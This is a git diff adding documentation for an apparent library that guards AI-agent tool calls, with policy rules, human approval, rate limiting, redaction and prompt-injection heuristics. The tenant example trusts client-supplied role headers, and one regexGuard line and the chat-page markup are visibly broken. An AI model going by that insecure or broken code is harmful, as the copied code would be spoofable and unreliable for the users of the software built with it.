+export interface TenantContext { + tenantId: string; + userId: string; + plan: "free" | "pro" | "enterprise"; + role: "viewer" | "editor" | "admin"; +} + +/** + * In production, decode a JWT or call your auth service. + * Here we simulate a lookup from request headers. + */ +export function resolveTenantContext(request: Request): TenantContext { + // These would typically come from a validated JWT payload. + const tenantId = request.headers.get("x-tenant-id") ?? "unknown"; + const userId = request.headers.get("x-user-id") ?? 
"unknown"; + const plan = (request.headers.get("x-tenant-plan") ?? "free") as TenantContext["plan"]; + const role = (request.headers.get("x-user-role") ?? "viewer") as TenantContext["role"]; + + return { tenantId, userId, plan, role }; +} +``` + +--- + +## Guard factory + +The guard is created per-request so that `resolveUserAttributes` captures the current request context via closure. + +```ts title="lib/tenant-guard.ts" +import { + createToolGuard, + allow, + deny, + requireApproval, + type DecisionRecord, + type PolicyContext, +} from "ai-tool-guard"; +import { type TenantContext } from "./tenant"; + +// --------------------------------------------------------------------------- +// Per-tenant audit log +// +// Write to a per-tenant partition so that logs can be queried and +// exported independently for each customer. +// --------------------------------------------------------------------------- +import { appendFileSync, mkdirSync } from "node:fs"; +import { join } from "node:path"; + +function tenantAuditLog(tenantId: string, record: DecisionRecord): void { + const dir = `/var/log/tenants/${tenantId}`; + try { + mkdirSync(dir, { recursive: true }); + appendFileSync(join(dir, "audit.jsonl"), JSON.stringify(record) + "\n"); + } catch { + console.error(`[audit] Failed to write for tenant ${tenantId}`, record.id); + } +} + +// --------------------------------------------------------------------------- +// Guard factory +// --------------------------------------------------------------------------- + +export function createTenantGuard(tenant: TenantContext) { + return createToolGuard({ + // ------------------------------------------------------------------ + // Policy rules + // ------------------------------------------------------------------ + rules: [ + // ---------------------------------------------------------------- + // Free plan: read-only access only. 
+ // ---------------------------------------------------------------- + deny({ + tools: ["createRecord", "updateRecord", "deleteRecord", "bulkOperation", "adminPanel"], + description: "Free plan users cannot perform write operations.", + condition: (ctx) => ctx.userAttributes["plan"] === "free", + priority: 100, + }), + + // ---------------------------------------------------------------- + // Pro plan: read + write, but no bulk operations or admin panel. + // ---------------------------------------------------------------- + deny({ + tools: ["bulkOperation", "adminPanel"], + description: "Bulk operations and admin panel require an enterprise plan.", + condition: (ctx) => ctx.userAttributes["plan"] === "pro", + priority: 90, + }), + + // ---------------------------------------------------------------- + // Role-based access: viewers cannot write regardless of plan. + // ---------------------------------------------------------------- + deny({ + tools: ["createRecord", "updateRecord", "deleteRecord", "bulkOperation"], + description: "Viewer role does not have write access.", + condition: (ctx) => ctx.userAttributes["role"] === "viewer", + priority: 85, + }), + + // ---------------------------------------------------------------- + // Admin-only tools: require both enterprise plan and admin role. + // ---------------------------------------------------------------- + deny({ + tools: "adminPanel", + description: "Admin panel requires enterprise plan and admin role.", + condition: (ctx) => + ctx.userAttributes["plan"] !== "enterprise" || + ctx.userAttributes["role"] !== "admin", + priority: 80, + }), + + // ---------------------------------------------------------------- + // Destructive operations: always require approval, even for admins. 
+ // ---------------------------------------------------------------- + requireApproval({ + tools: "deleteRecord", + riskLevels: ["high"], + description: "Record deletion requires human confirmation.", + condition: (ctx) => + ctx.userAttributes["plan"] === "enterprise" && + ctx.userAttributes["role"] === "admin", + priority: 70, + }), + + // ---------------------------------------------------------------- + // Bulk operations: require approval from enterprise admins. + // ---------------------------------------------------------------- + requireApproval({ + tools: "bulkOperation", + description: "Bulk operations require operator approval.", + condition: (ctx) => + ctx.userAttributes["plan"] === "enterprise" && + ctx.userAttributes["role"] === "admin", + priority: 70, + }), + + // ---------------------------------------------------------------- + // Write access for editors (pro and enterprise). + // ---------------------------------------------------------------- + allow({ + tools: ["createRecord", "updateRecord"], + description: "Editors on pro and enterprise plans can write.", + condition: (ctx) => + ["pro", "enterprise"].includes(ctx.userAttributes["plan"] as string) && + ["editor", "admin"].includes(ctx.userAttributes["role"] as string), + priority: 50, + }), + + // ---------------------------------------------------------------- + // Universal read access. + // ---------------------------------------------------------------- + allow({ + tools: ["listRecords", "getRecord", "searchRecords"], + riskLevels: ["low"], + description: "All authenticated users may read records.", + priority: 10, + }), + ], + + defaultRiskLevel: "medium", + + // ------------------------------------------------------------------ + // Inject the full tenant context as user attributes. + // Policy rule conditions read from ctx.userAttributes. 
+ // ------------------------------------------------------------------ + resolveUserAttributes: () => ({ + tenantId: tenant.tenantId, + userId: tenant.userId, + plan: tenant.plan, + role: tenant.role, + }), + + // ------------------------------------------------------------------ + // Rate limiting — keyed per tool; limits apply within this process. + // For distributed rate limiting, implement a custom RateLimiter + // backed by Redis and pass it as a PolicyBackend. + // ------------------------------------------------------------------ + defaultRateLimit: { + maxCalls: 100, + windowMs: 60_000, + strategy: "reject", + }, + + // ------------------------------------------------------------------ + // Approval handler — route to the tenant's configured approver. + // ------------------------------------------------------------------ + onApprovalRequired: async (token) => { + console.info( + `[approval] tenant=${tenant.tenantId} tool=${token.toolName} token=${token.id}` + ); + // Replace with tenant-specific approval workflow (Slack, email, etc.). + return { + approved: false, + reason: "Approval workflow not configured for this tenant.", + }; + }, + + // ------------------------------------------------------------------ + // Decision callback — write to the per-tenant audit partition. 
+ // ------------------------------------------------------------------ + onDecision: (record) => { + tenantAuditLog(tenant.tenantId, record); + }, + }); +} +``` + +--- + +## Tool definitions + +```ts title="lib/tenant-tools.ts" +import { tool } from "ai"; +import { z } from "zod"; +import { zodGuard, secretsFilter, piiOutputFilter } from "ai-tool-guard"; +import { createTenantGuard } from "./tenant-guard"; +import { type TenantContext } from "./tenant"; + +// --------------------------------------------------------------------------- +// Raw tool definitions +// --------------------------------------------------------------------------- + +const listRecordsTool = tool({ + description: "List records in a collection with optional filters.", + parameters: z.object({ + collection: z.string(), + filter: z.string().optional(), + limit: z.number().int().min(1).max(100).default(20), + }), + execute: async ({ collection, filter, limit }) => ({ + collection, + records: [], // replace with real query + total: 0, + filter, + limit, + }), +}); + +const getRecordTool = tool({ + description: "Retrieve a single record by ID.", + parameters: z.object({ + collection: z.string(), + id: z.string(), + }), + execute: async ({ collection, id }) => ({ + collection, + id, + data: {}, // replace with real fetch + }), +}); + +const createRecordTool = tool({ + description: "Create a new record in a collection.", + parameters: z.object({ + collection: z.string(), + data: z.record(z.unknown()), + }), + execute: async ({ collection, data }) => ({ + id: crypto.randomUUID(), + collection, + data, + createdAt: new Date().toISOString(), + }), +}); + +const updateRecordTool = tool({ + description: "Update fields on an existing record.", + parameters: z.object({ + collection: z.string(), + id: z.string(), + patch: z.record(z.unknown()), + }), + execute: async ({ collection, id, patch }) => ({ + collection, + id, + patch, + updatedAt: new Date().toISOString(), + }), +}); + +const deleteRecordTool = 
tool({ + description: "Permanently delete a record.", + parameters: z.object({ + collection: z.string(), + id: z.string(), + }), + execute: async ({ collection, id }) => ({ + deleted: true, + collection, + id, + }), +}); + +const bulkOperationTool = tool({ + description: "Apply an operation to all records matching a filter.", + parameters: z.object({ + collection: z.string(), + operation: z.enum(["delete", "archive", "export"]), + filter: z.string(), + }), + execute: async ({ collection, operation, filter }) => ({ + collection, + operation, + filter, + affectedCount: 0, // replace with real query + }), +}); + +const adminPanelTool = tool({ + description: "Access tenant administration functions.", + parameters: z.object({ + action: z.enum(["list_users", "reset_quota", "view_billing"]), + }), + execute: async ({ action }) => ({ + action, + result: {}, // replace with real admin call + }), +}); + +// --------------------------------------------------------------------------- +// Guarded tools — assembled per-request with tenant context +// --------------------------------------------------------------------------- + +export function buildTenantTools(tenant: TenantContext) { + const guard = createTenantGuard(tenant); + + return guard.guardTools({ + listRecords: { + tool: listRecordsTool, + riskLevel: "low", + riskCategories: ["data-read"], + outputFilters: [piiOutputFilter()], + }, + getRecord: { + tool: getRecordTool, + riskLevel: "low", + riskCategories: ["data-read"], + outputFilters: [secretsFilter(), piiOutputFilter()], + }, + createRecord: { + tool: createRecordTool, + riskLevel: "medium", + riskCategories: ["data-write"], + argGuards: [ + zodGuard({ + field: "collection", + schema: z.string().regex(/^[a-z][a-z0-9_]{1,63}$/, "Invalid collection name."), + }), + ], + }, + updateRecord: { + tool: updateRecordTool, + riskLevel: "medium", + riskCategories: ["data-write"], + }, + deleteRecord: { + tool: deleteRecordTool, + riskLevel: "high", + riskCategories: 
["data-delete"], + }, + bulkOperation: { + tool: bulkOperationTool, + riskLevel: "high", + riskCategories: ["data-delete", "data-write"], + }, + adminPanel: { + tool: adminPanelTool, + riskLevel: "high", + riskCategories: ["authentication"], + }, + }); +} +``` + +--- + +## Route handler + +```ts title="app/api/chat/route.ts" +import { streamText } from "ai"; +import { openai } from "@ai-sdk/openai"; +import { ToolGuardError } from "ai-tool-guard"; +import { resolveTenantContext } from "@/lib/tenant"; +import { buildTenantTools } from "@/lib/tenant-tools"; + +export async function POST(request: Request) { + // Resolve tenant from the authenticated request. + const tenant = resolveTenantContext(request); + + const { messages } = await request.json(); + + // Build a tool set scoped to this tenant's plan and role. + const tools = buildTenantTools(tenant); + + try { + const result = streamText({ + model: openai("gpt-4o"), + system: `You are an AI assistant for tenant "${tenant.tenantId}". ` + + `The current user has the "${tenant.role}" role on the "${tenant.plan}" plan. ` + + "Only attempt operations appropriate for their access level.", + messages, + tools, + maxSteps: 5, + }); + + return result.toDataStreamResponse(); + } catch (err) { + if (err instanceof ToolGuardError) { + return Response.json( + { + error: "tool_guard_error", + code: err.code, + tool: err.toolName, + message: err.message, + tenant: tenant.tenantId, + }, + { status: err.code === "rate-limited" ? 429 : 403 } + ); + } + + console.error(`[${tenant.tenantId}] Unexpected error:`, err); + return Response.json({ error: "internal_error" }, { status: 500 }); + } +} +``` + +--- + +## Policy matrix summary + +The table below shows the effective verdict for each tool, plan, and role combination after all rules are applied. Higher-priority rules take precedence. 
+ +| Tool | free/viewer | pro/viewer | pro/editor | enterprise/viewer | enterprise/editor | enterprise/admin | +|---|---|---|---|---|---|---| +| `listRecords` | allow | allow | allow | allow | allow | allow | +| `getRecord` | allow | allow | allow | allow | allow | allow | +| `createRecord` | deny | deny | allow | deny | allow | allow | +| `updateRecord` | deny | deny | allow | deny | allow | allow | +| `deleteRecord` | deny | deny | deny | deny | deny | require-approval | +| `bulkOperation` | deny | deny | deny | deny | deny | require-approval | +| `adminPanel` | deny | deny | deny | deny | deny | allow | + +!!! info "Rule ordering matters" + Rules are evaluated from highest to lowest `priority`. The first matching rule wins. In this setup, the plan-level checks (priority 100 for free, 90 for pro) fire before the role check (priority 85), which means a free-plan admin still cannot write — the plan-level deny fires first. Adjust priorities if you need different precedence. + +!!! tip "Distributed rate limiting" + The built-in `RateLimiter` is in-process and does not share state between serverless worker instances. For per-tenant distributed rate limiting, implement a `PolicyBackend` that calls a Redis counter, and configure it via the `backend` option on `createToolGuard`. + +--- + +## Related + +- [Policy Engine](../guides/policy-engine.md) — condition predicates, `PolicyContext`, and escalation. +- [External Backends](../guides/external-backends.md) — delegating decisions to OPA or Cedar. +- [Rate Limiting](../guides/rate-limiting.md) — per-tool and global rate limits. +- [Decision Records](../guides/decision-records.md) — `DecisionRecord` structure for audit logging. 
diff --git a/docs/examples/nextjs-integration.md b/docs/examples/nextjs-integration.md new file mode 100644 index 0000000..49fcb55 --- /dev/null +++ b/docs/examples/nextjs-integration.md @@ -0,0 +1,405 @@ +# Next.js Integration + +This example walks through a complete Next.js App Router setup using `ai-tool-guard` with the Vercel AI SDK. The guard is created once as a module-level singleton, tools are defined with `tool()` from the `ai` package, and a human-in-the-loop approval flow is handled through a dedicated API endpoint. + +--- + +## Prerequisites + +```bash +npm install ai-tool-guard ai zod +npm install @opentelemetry/api # optional, for tracing +``` + +--- + +## Guard singleton + +Create the guard in a shared module so it is initialised once across all requests. The guard holds the rate limiter state and the approval manager, so it must not be recreated per-request. + +```ts title="lib/guard.ts" +import { + createToolGuard, + requireApproval, + deny, + allow, + ToolGuardError, + type ApprovalToken, + type ApprovalResolution, +} from "ai-tool-guard"; + +// --------------------------------------------------------------------------- +// Pending approvals store +// +// In production, replace this with Redis or a database so that +// the approval-resolution endpoint and the chat endpoint can +// run on separate serverless instances. +// --------------------------------------------------------------------------- +export const pendingApprovals = new Map< + string, + { resolve: (r: ApprovalResolution) => void; token: ApprovalToken } +>(); + +export const guard = createToolGuard({ + rules: [ + // Read operations — allow outright. + allow({ + tools: "lookupOrder", + description: "Order lookups are safe for autonomous execution.", + priority: 10, + }), + // Write operations — require human approval. 
+ requireApproval({ + tools: ["updateAddress", "issueRefund"], + description: "State-mutating tools require operator sign-off.", + priority: 20, + }), + // Destructive operations — deny entirely. + deny({ + tools: "cancelOrder", + riskLevels: ["high", "critical"], + description: "Cancellations are not permitted through the AI assistant.", + priority: 30, + }), + ], + + defaultRiskLevel: "medium", + + // Called when a tool reaches require-approval verdict. + onApprovalRequired: async (token) => { + return new Promise((resolve) => { + // Store the resolver; the /api/approve route calls it. + pendingApprovals.set(token.id, { resolve, token }); + + // Expire unresolved tokens after the built-in TTL. + setTimeout(() => { + if (pendingApprovals.has(token.id)) { + pendingApprovals.delete(token.id); + resolve({ approved: false, reason: "Approval timed out." }); + } + }, token.ttlMs ?? 300_000); + }); + }, + + onDecision: (record) => { + console.log( + JSON.stringify({ + level: "info", + event: "tool_decision", + id: record.id, + tool: record.toolName, + verdict: record.verdict, + rules: record.matchedRules, + durationMs: record.evalDurationMs, + }) + ); + }, + + otel: { + enabled: true, + tracerName: "nextjs-ai-app", + defaultAttributes: { "deployment.environment": "production" }, + }, +}); +``` + +!!! note "Singleton lifetime in serverless" + Next.js module state is reused across warm invocations within a single worker process. On a serverless platform where workers are recycled frequently, replace `pendingApprovals` with a distributed store (e.g. Redis with `BLPOP`) so that the chat route and the approval route can run on different instances. + +--- + +## Tool definitions + +Define tools with the Vercel AI SDK `tool()` helper, then wrap them with `guard.guardTools()` to assign risk configuration and output filters. 
+ +```ts title="lib/tools.ts" +import { tool } from "ai"; +import { z } from "zod"; +import { + zodGuard, + regexGuard, + secretsFilter, + piiOutputFilter, +} from "ai-tool-guard"; +import { guard } from "./guard"; + +// --------------------------------------------------------------------------- +// Raw AI SDK tool definitions +// --------------------------------------------------------------------------- + +const lookupOrderTool = tool({ + description: "Look up an order by ID and return its current status.", + parameters: z.object({ + orderId: z.string().min(1), + }), + execute: async ({ orderId }) => { + // Replace with real database call. + return { + orderId, + status: "shipped", + estimatedDelivery: "2026-02-20", + trackingNumber: "1Z999AA10123456784", + }; + }, +}); + +const updateAddressTool = tool({ + description: "Update the shipping address for an unshipped order.", + parameters: z.object({ + orderId: z.string().min(1), + newAddress: z.string().min(10), + }), + execute: async ({ orderId, newAddress }) => { + // Replace with real mutation. + return { success: true, orderId, updatedAddress: newAddress }; + }, +}); + +const issueRefundTool = tool({ + description: "Issue a full or partial refund for a completed order.", + parameters: z.object({ + orderId: z.string().min(1), + amount: z.number().positive(), + reason: z.enum(["damaged", "not_received", "wrong_item", "changed_mind"]), + }), + execute: async ({ orderId, amount, reason }) => { + return { success: true, orderId, refundedAmount: amount, reason }; + }, +}); + +// --------------------------------------------------------------------------- +// Guarded tools — pass to streamText({ tools }) +// --------------------------------------------------------------------------- + +export const guardedTools = guard.guardTools({ + lookupOrder: { + tool: lookupOrderTool, + riskLevel: "low", + riskCategories: ["data-read"], + // Scrub secrets and PII from order records before the model sees them. 
+ outputFilters: [secretsFilter(), piiOutputFilter()], + }, + updateAddress: { + tool: updateAddressTool, + riskLevel: "medium", + riskCategories: ["data-write", "pii"], + argGuards: [ + zodGuard({ + field: "orderId", + schema: z.string().regex(/^ORD-\d{6,}$/, "Invalid order ID format."), + }), + // Reject addresses that look like they contain SQL or script injection. + regexGuard("newAddress", /; + reason?: string; + }; + + const pending = pendingApprovals.get(tokenId); + if (!pending) { + return Response.json( + { error: "Unknown or expired approval token." }, + { status: 404 } + ); + } + + // Resolve the promise that the guard is awaiting. + pending.resolve({ + approved, + approvedBy, + patchedArgs, + reason, + }); + + pendingApprovals.delete(tokenId); + + return Response.json({ ok: true, tokenId }); +} + +// List pending approvals for the admin UI. +export async function GET() { + const tokens = Array.from(pendingApprovals.values()).map((p) => p.token); + return Response.json({ pending: tokens }); +} +``` + +--- + +## Client — chat UI + +Use `useChat` from `ai/react`. When the API returns a `tool_guard_error`, display it inline rather than throwing. + +```tsx title="app/chat/page.tsx" +"use client"; + +import { useChat } from "ai/react"; + +export default function ChatPage() { + const { messages, input, handleInputChange, handleSubmit, error } = useChat({ + api: "/api/chat", + }); + + return ( +
+

Customer Support

+ +
    + {messages.map((m) => ( +
  • + {m.role === "user" ? "You" : "Assistant"}:{" "} + {m.content} +
  • + ))} +
+ + {error && ( +

+ {/* The error body is a JSON string from our route handler. */} + {(() => { + try { + const parsed = JSON.parse(error.message); + return `Blocked: ${parsed.message} (code: ${parsed.code})`; + } catch { + return error.message; + } + })()} +

+ )} + +
+ + +
+
+ ); +} +``` + +--- + +## How the approval flow works end-to-end + +1. The model calls `issueRefund` or `updateAddress`. +2. The guard evaluates the `require-approval` rule and invokes `onApprovalRequired`. +3. `onApprovalRequired` stores a `Promise` resolver in `pendingApprovals` and returns the promise. +4. The AI SDK route is blocked, awaiting the resolution. The HTTP connection remains open (set `runtime = "nodejs"` to avoid the default 10-second Edge timeout). +5. An admin sees the pending approval via `GET /api/approve` and posts a resolution to `POST /api/approve`. +6. The resolver fires, the guard receives the `ApprovalResolution`, and execution continues with the original (or patched) arguments. +7. The stream completes and the client receives the final response. + +!!! warning "Serverless timeout" + By default, Vercel serverless functions time out after 10 seconds on the Hobby plan and 60 seconds on Pro. For approval flows that may take minutes, use the `runtime = "nodejs"` export and configure a longer `maxDuration` in `next.config.ts`, or move the approval wait into a separate background job pattern. + +!!! tip "Patching arguments" + The approver can modify arguments before execution. For example, an operator reviewing an `issueRefund` call can lower the `amount` by returning `patchedArgs: { amount: 50 }` in the POST body. The guard merges the patched fields over the original arguments. + +--- + +## Related + +- [Approval Workflows](../guides/approval-workflows.md) — full lifecycle documentation. +- [Argument Validation](../guides/argument-validation.md) — all available arg guard factories. +- [Output Filtering](../guides/output-filtering.md) — `secretsFilter` and `piiOutputFilter` in depth. +- [Error Handling](../guides/error-handling.md) — `ToolGuardError` codes. 
diff --git a/docs/getting-started/concepts.md b/docs/getting-started/concepts.md new file mode 100644 index 0000000..df9d86f --- /dev/null +++ b/docs/getting-started/concepts.md @@ -0,0 +1,225 @@ +# Core Concepts + +Understand the key abstractions and mental model behind ai-tool-guard. + +--- + +## Risk Levels + +Every tool you register with ai-tool-guard is assigned a **risk level**. This single value drives default policy decisions and determines how cautiously the guard treats a tool call before you write any custom rules. + +| Level | Description | Default policy behavior | +|---|---|---| +| `low` | Read-only operations, safe queries | Allow automatically | +| `medium` | Write operations with bounded, reversible impact | Require approval | +| `high` | Destructive or sensitive operations | Deny by default | +| `critical` | Irreversible actions affecting infrastructure or security | Deny by default | + +**Examples by level:** + +- `low` — `getWeather`, `searchProducts`, `listFiles` +- `medium` — `updateProfile`, `sendEmail`, `createRecord` +- `high` — `deleteUser`, `processPayment`, `exportDatabase` +- `critical` — `dropDatabase`, `revokeAllTokens`, `purgeBackups` + +!!! tip + The `defaultPolicy()` helper generates a baseline rule set from these levels. You can layer custom rules on top to tighten or relax behavior for specific tools. + +!!! note + Risk level is not a security boundary on its own. It is an input to policy evaluation. Explicit `deny` rules always take precedence regardless of level. + +--- + +## Risk Categories + +Risk categories are **classification tags** applied to tools alongside the risk level. They do not affect policy matching directly, but they appear in every `DecisionRecord` and can be used to build audit queries, dashboards, and category-scoped external policies. 
+ +| Category | Description | +|---|---| +| `data-read` | Reading records, querying databases, fetching content | +| `data-write` | Creating or updating persisted data | +| `data-delete` | Removing records, truncating datasets | +| `network` | Making outbound HTTP requests, webhooks, integrations | +| `filesystem` | Reading or writing files on disk | +| `authentication` | Token issuance, session management, credential changes | +| `payment` | Billing, charge, refund, and subscription operations | +| `pii` | Accessing or processing personally identifiable information | +| `custom` | Application-specific categories defined by the caller | + +A tool can carry multiple categories. For example, a `sendInvoiceEmail` tool might be tagged `["network", "payment", "pii"]`. + +!!! info + Categories are surfaced in decision records and passed to external approval backends, giving those systems the context needed to make informed decisions without needing to inspect tool arguments directly. + +--- + +## Decision Verdicts + +After evaluating all applicable rules, ai-tool-guard produces one of three **verdicts**: + +| Verdict | Meaning | +|---|---| +| `allow` | The tool call proceeds to execution immediately | +| `require-approval` | Execution pauses and the configured approval handler is invoked | +| `deny` | The tool call is blocked and a `ToolGuardError` is thrown | + +### Escalation semantics + +When multiple rules match a single tool call, the **most restrictive verdict wins**: + +``` +deny > require-approval > allow +``` + +A rule producing `deny` cannot be overridden by another rule producing `allow`. This prevents a permissive catch-all rule from inadvertently lowering the effective verdict on a sensitive operation. + +!!! tip + Design rules so that the most permissive case is the baseline and stricter rules layer on top. Relying on escalation to enforce security is safer than relying on rule ordering. 
+ +--- + +## The Execution Pipeline + +Every tool call intercepted by ai-tool-guard passes through seven ordered stages. Each stage can halt execution before the tool runs. + +``` +Tool call invoked + | + v +┌───────────────────────┐ +│ 1. Injection detection │ Heuristic scan of arguments for prompt injection patterns +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 2. Argument validation │ Zod schemas, allowlists, denylists, regex, PII scanning +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 3. Policy evaluation │ Rules + external backend determine verdict +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 4. Approval flow │ If verdict is require-approval, invoke handler and wait +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 5. Rate limiting │ Sliding window count + concurrency check +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 6. Tool execution │ The actual tool function runs (or dry-run returns mock) +└───────────┬───────────┘ + | + v +┌───────────────────────┐ +│ 7. Output filtering │ Secrets stripping and PII redaction on the result +└───────────┬───────────┘ + | + v + Result returned +``` + +**Stage descriptions:** + +1. **Injection detection** — Before any other check, raw argument values are scanned for heuristic patterns associated with prompt injection (e.g., instruction overrides, role-switching phrases). A positive signal raises an immediate `deny` verdict. + +2. **Argument validation** — Structured argument guards run per-argument: Zod schema checks, allowlist/denylist membership, regex pattern matching, and PII field detection. Failures produce a `deny` verdict with a descriptive reason. + +3. **Policy evaluation** — The guard evaluates all matching rules (built-in defaults, custom rules, and responses from any configured external backend) and resolves a final verdict using escalation semantics. + +4. 
**Approval flow** — If the resolved verdict is `require-approval`, execution pauses and the `onApprovalRequired` callback is invoked. The callback receives an `ApprovalToken` with the full decision context and must return an `ApprovalResolution` object (`{ approved: boolean, patchedArgs?, approvedBy? }`) to continue or abort. + +5. **Rate limiting** — A sliding window counter checks whether the tool has exceeded its configured call rate. A concurrency check verifies that the tool is not already executing more instances than the configured maximum. Either failure produces a `deny` verdict. + +6. **Tool execution** — The wrapped tool function is called with the original arguments. If the guard is running in dry-run mode, execution is skipped and a configured mock response is returned instead. + +7. **Output filtering** — The tool result is scanned for sensitive values. Configured secret patterns and PII field names are redacted before the result is returned to the model. Redaction actions are recorded in the `DecisionRecord`. + +!!! note + Stages 1 through 5 run before the tool executes. A failure at any pre-execution stage means the tool never runs and no side effects occur. + +--- + +## Decision Records + +Every evaluation — successful or blocked — produces a **`DecisionRecord`**: a structured, immutable audit object that captures the full context of the decision. 
+ +| Field | Type | Description | +|---|---|---| +| `id` | `string` | Unique identifier for this evaluation | +| `timestamp` | `Date` | When the evaluation occurred | +| `verdict` | `"allow" \| "deny" \| "require-approval"` | The resolved verdict | +| `toolName` | `string` | The name of the evaluated tool | +| `matchedRules` | `string[]` | IDs or names of all rules that matched | +| `riskLevel` | `RiskLevel` | The tool's configured risk level | +| `riskCategories` | `RiskCategory[]` | The tool's configured categories | +| `attributes` | `Record` | Arbitrary context attributes attached at call time | +| `reason` | `string` | Human-readable explanation of the verdict | +| `redactions` | `RedactionRecord[]` | Fields redacted in the output and why | +| `evalDurationMs` | `number` | Time taken to complete the evaluation in milliseconds | +| `dryRun` | `boolean` | Whether this evaluation ran in dry-run mode | + +Decision records are delivered to your code through the `onDecision` callback configured in `GuardOptions`. From there, you can persist them to a database, forward them to a logging pipeline, or emit them as structured log events. + +!!! tip + Because every evaluation produces a record — including allowed calls — you get a complete audit trail, not just a log of blocked events. This makes it possible to retrospectively analyze what the model was doing when an incident occurred. + +--- + +## Guard Options vs Tool Config + +ai-tool-guard uses two distinct configuration objects that operate at different scopes. + +### `GuardOptions` — global settings + +Passed once to `createToolGuard()`. Applies to every tool registered with the guard. 
+ +| Field | Purpose | +|---|---| +| `rules` | Array of policy rules evaluated for all tools | +| `backend` | External approval or policy backend (HTTP, custom) | +| `injectionDetection` | Enable/disable and configure injection heuristics | +| `rateLimits` | Global default rate limit settings | +| `otel` | OpenTelemetry tracer and meter configuration | +| `onDecision` | Callback invoked after every evaluation with the `DecisionRecord` | +| `onApprovalRequired` | Callback invoked when a verdict is `require-approval` | +| `dryRun` | When `true`, no tool executes; mock responses are returned | + +### `ToolGuardConfig` — per-tool settings + +Passed per-tool via `guardTool()` or as values in the `guardTools()` map. Overrides or extends global settings for a specific tool. + +| Field | Purpose | +|---|---| +| `riskLevel` | The tool's risk level (`low`, `medium`, `high`, `critical`) | +| `riskCategories` | Classification tags for this tool | +| `argGuards` | Per-argument validation rules (Zod, allowlist, denylist, regex, PII) | +| `outputFilters` | Secret and PII redaction patterns applied to this tool's output | +| `rateLimit` | Per-tool call rate limit (overrides global default) | +| `maxConcurrency` | Maximum simultaneous executions of this tool | +| `requireApproval` | Force `require-approval` verdict for this tool regardless of rules | + +!!! info + Global settings in `GuardOptions` establish the baseline for all tools. Per-tool settings in `ToolGuardConfig` narrow or extend that baseline for specific tools. Where both define the same setting, the per-tool value takes precedence. 
+ +```typescript +const guard = createToolGuard({ + // GuardOptions — applies to every tool + rules: defaultPolicy(), + onDecision: (record) => auditLog.write(record), +}); + +const safeTool = guard.guardTool("myTool", myTool, { + // ToolGuardConfig — applies only to myTool + riskLevel: "medium", + riskCategories: ["data-write", "network"], + argGuards: [ + piiGuard("email"), + ], +}); +``` diff --git a/docs/getting-started/installation.md b/docs/getting-started/installation.md new file mode 100644 index 0000000..74d63cd --- /dev/null +++ b/docs/getting-started/installation.md @@ -0,0 +1,127 @@ +# Installation + +This guide walks through installing `ai-tool-guard` and configuring your project for use with the library. + +## Prerequisites + +Before installing, ensure your environment meets the following requirements: + +- **Node.js 20 or later** — required for native ESM support and modern runtime features +- **TypeScript 5.7 or later** — required for accurate module resolution and type inference + +## Install the Package + +Install `ai-tool-guard` from npm: + +```bash +npm install ai-tool-guard +``` + +## Peer Dependencies + +`ai-tool-guard` has two required peer dependencies and one optional peer dependency. + +### Required + +| Package | Version | Purpose | +|---------|---------|---------| +| `ai` | `>=4.0.0` | Vercel AI SDK — provides the tool calling primitives that ai-tool-guard wraps | +| `zod` | `>=3.0.0` | Schema validation used by the built-in `zodGuard` and argument guards | + +Install both at once: + +```bash +npm install ai zod +``` + +### Optional + +| Package | Version | Purpose | +|---------|---------|---------| +| `@opentelemetry/api` | `>=1.0.0` | Enables structured tracing via the `ai-tool-guard/otel` subpath export | + +Install if you intend to use the OpenTelemetry integration: + +```bash +npm install @opentelemetry/api +``` + +!!! 
info "OpenTelemetry is opt-in" + The core library and all other subpath exports function without `@opentelemetry/api`. You only need it if you import from `ai-tool-guard/otel`. + +## TypeScript Configuration + +`ai-tool-guard` is published as an ES module (ESM). Your `tsconfig.json` must be configured for ESM resolution. The following settings are recommended: + +```json title="tsconfig.json" +{ + "compilerOptions": { + "target": "ES2022", + "module": "ESNext", + "moduleResolution": "bundler", + "esModuleInterop": true, + "verbatimModuleSyntax": true + } +} +``` + +!!! warning "CommonJS projects" + If your project uses CommonJS (`"module": "CommonJS"`), you will need to either migrate to ESM or use a bundler that can handle ESM packages. The library does not ship a CommonJS build. + +!!! tip "Using a bundler" + When targeting a bundler (Vite, webpack, esbuild, Rollup), `"moduleResolution": "bundler"` is the correct setting. For projects running directly under Node.js without a bundler, use `"moduleResolution": "NodeNext"` and ensure your `package.json` includes `"type": "module"`. + +## Verify the Installation + +After installing, confirm everything is wired up correctly by running a quick import check. Create a temporary file: + +```ts title="verify.ts" +import { createToolGuard } from "ai-tool-guard"; + +const guard = createToolGuard(); +console.log("ai-tool-guard is ready!"); +``` + +Run it with `tsx` or your preferred TypeScript runner: + +```bash +npx tsx verify.ts +``` + +You should see: + +``` +ai-tool-guard is ready! +``` + +If you encounter a module resolution error, double-check that your `tsconfig.json` matches the settings above and that peer dependencies are installed. + +## Subpath Exports + +`ai-tool-guard` exposes a set of granular subpath exports so you can import only what you need, keeping bundle sizes lean. Each subpath is independently tree-shakeable. 
+ +| Import path | Contents | +|-------------|----------| +| `ai-tool-guard` | Core API — `createToolGuard`, `ToolGuard`, `ToolGuardError` | +| `ai-tool-guard/policy` | Policy engine — `evaluatePolicy`, `allow`, `deny`, `requireApproval`, `simulate` | +| `ai-tool-guard/approval` | Approval flow — `ApprovalManager` | +| `ai-tool-guard/guards` | Built-in guards — `zodGuard`, `allowlist`, `denylist`, `secretsFilter`, `RateLimiter`, and more | +| `ai-tool-guard/otel` | OpenTelemetry integration — `createTracer`, `ATTR`, span helpers | +| `ai-tool-guard/mcp` | MCP drift detection — `detectDrift`, `FingerprintStore` | + +### Usage example + +Rather than importing everything from the root, prefer the specific subpath for the functionality you need: + +```ts +import { createToolGuard } from "ai-tool-guard"; +import { allow, deny, requireApproval } from "ai-tool-guard/policy"; +import { zodGuard, secretsFilter } from "ai-tool-guard/guards"; +``` + +!!! tip "Import from the root when in doubt" + The root `ai-tool-guard` export re-exports the most commonly used symbols. Start there and switch to subpath imports once you know which modules you rely on. + +## Next Steps + +With the library installed, move on to [Quick Start](quick-start.md) to create your first guarded tool. diff --git a/docs/getting-started/quick-start.md b/docs/getting-started/quick-start.md new file mode 100644 index 0000000..24d75ff --- /dev/null +++ 